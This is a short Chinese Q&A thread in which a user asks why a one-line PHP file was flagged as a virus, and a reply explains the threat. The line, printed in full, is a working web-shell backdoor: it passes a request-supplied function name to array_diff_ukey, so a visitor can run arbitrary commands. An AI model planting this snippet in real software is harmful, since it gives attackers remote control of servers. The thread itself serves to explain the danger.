1. 首页
  2. 问答
  3. array_diff_ukey的PHP问题

array_diff_ukey的PHP问题

2016-05-16 62 views
0

我的网站托管向我发送了一条关于我的文件声明该文件是病毒威胁的警告。 你能向我解释为什么这段代码是错的吗? 谢谢array_diff_ukey的PHP问题

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); 
?>

来源

2016-05-16 be well

+0

为什么你需要'@array()'?这可能是错误的,因为您将原始密码传递给来自用户的某个函数。 – Justinas

+0

老实说,我继承了这个项目,那不是我的决定,就像现在这样。 –

回答

0

回调使用的array_diff()可以由用户($_REQUEST['login'])来指定,所以他们请求的login字段中指定的任何功能(或URL)将由该执行码。这使它很危险。

你甚至没有检查是否获得来自$ _POST或$ _GET的值,所以你有什么获取在没有通过控制

来源

2016-05-16 10:38:03

相关问题

 相关问题